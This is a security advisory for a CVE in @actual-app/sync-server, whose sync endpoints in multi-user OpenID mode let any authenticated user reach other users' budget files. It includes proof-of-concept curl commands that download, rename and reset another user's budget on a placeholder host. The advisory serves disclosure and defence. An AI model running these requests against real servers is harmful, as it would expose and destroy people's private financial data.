CVE-2026-27638
@actual-app/sync-server: Missing authorization in sync endpoints allows cross-user budget file access in multi-user mode
Description
In multi-user mode (OpenID), the sync API endpoints (`/sync/*`) don't verify that the authenticated user owns or has access to the file being operated on. Any authenticated user can read, modify, and overwrite any other user's budget files by providing their file ID. ## Affected Code File: `packages/sync-server/src/app-sync.ts` The `validateSessionMiddleware` on line 31 confirms the user is authenticated, but individual endpoints only check that the file *exists* (via `verifyFileExists`), never that the requesting user *owns* or *has access to* the file. Compare with `POST /sync/delete-user-file` (lines 394-430) which correctly checks: ```js const isOwner = file.owner === userId; const isServerAdmin = isAdmin(userId); if (!isOwner && !isServerAdmin) { ... } ``` This check is missing from all other endpoints. ## Affected Endpoints - `GET /sync/download-user-file` - download any budget file - `POST /sync/upload-user-file` - overwrite any budget file - `POST /sync/sync` - read/write sync messages of any file - `POST /sync/user-get-key` - read encryption key info - `POST /sync/user-create-key` - change encryption key - `POST /sync/reset-user-file` - reset sync state - `POST /sync/update-user-filename` - rename file - `GET /sync/get-user-file-info` - read file metadata ## PoC Setup: Two users (Alice, Bob) authenticated via OpenID on the same Actual server. Alice has a budget with fileId `abc-123`. Bob downloads Alice's budget: ```bash curl -X GET 'https://actual.example.com/sync/download-user-file' \ -H 'X-Actual-Token: <bob-session-token>' \ -H 'X-Actual-File-Id: abc-123' \ -o stolen-budget.blob ``` Bob reads Alice's file metadata: ```bash curl -X GET 'https://actual.example.com/sync/get-user-file-info' \ -H 'X-Actual-Token: <bob-session-token>' \ -H 'X-Actual-File-Id: abc-123' ``` Bob renames Alice's budget: ```bash curl -X POST 'https://actual.example.com/sync/update-user-filename' \ -H 'X-Actual-Token: <bob-session-token>' \ -H 'Content-Type: application/json' \ -d '{"fileId": "abc-123", "name": "pwned"}' ``` Bob resets Alice's sync state (destructive): ```bash curl -X POST 'https://actual.example.com/sync/reset-user-file' \ -H 'X-Actual-Token: <bob-session-token>' \ -H 'Content-Type: application/json' \ -d '{"fileId": "abc-123"}' ``` File IDs can be discovered by admin users via `GET /sync/list-user-files` (admins see all files), through `user_access` sharing, or by guessing. ## Impact In multi-user deployments (OpenID mode), any authenticated user can steal other users' complete financial data (transactions, accounts, balances, payees), modify or destroy their budgets, and tamper with encryption keys. This is a personal finance app, so the data is highly sensitive.